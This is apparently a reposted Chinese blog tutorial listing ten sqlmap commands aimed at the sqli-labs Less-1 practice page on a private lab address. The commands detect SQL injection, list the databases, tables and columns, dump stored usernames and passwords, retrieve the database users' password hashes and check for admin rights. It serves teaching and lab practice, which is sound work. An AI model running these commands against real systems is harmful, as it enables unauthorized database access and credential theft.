标签:tab security ima color inf 网站 height pass lazy
(1)判断是否存在注入[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1"]
分析扫描的结果能看到存在联合查询,报错,布尔,时间
(2)查询当前用户下的所有数据库[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1" --dbs]
(3)获取数据库中的表名[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1" -D security --tables]
(4)获取表中的字段名[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1" -D security -T users --columns]
(5)获取字段内容
[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1" -D security -T users -C username,password --dump]
(6)获取数据库的所有用户[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1" --users]
(7)获取数据库用户的密码[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1" --passwords]
(8)获取当前网站数据库的名称[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1" --current-db]
(9)获取当前网站数据库的用户名[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1" --current-user]
(10)--is-dba :查看当前用户是否为管理员权限[sqlmap -u "http://192.168.233.128/sqli/Less-1/?id=1" --is-dba --level 5]
标签:tab security ima color inf 网站 height pass lazy
原文地址:https://www.cnblogs.com/touch-prc/p/13830107.html
